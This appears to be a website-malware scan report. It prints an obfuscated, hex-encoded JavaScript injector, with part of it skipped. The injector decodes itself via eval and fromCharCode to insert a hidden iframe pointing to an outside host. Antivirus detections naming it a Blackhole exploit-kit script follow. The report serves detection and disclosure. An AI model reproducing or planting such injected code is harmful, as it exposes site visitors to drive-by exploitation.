Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/js/jquery.flexslider.js | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |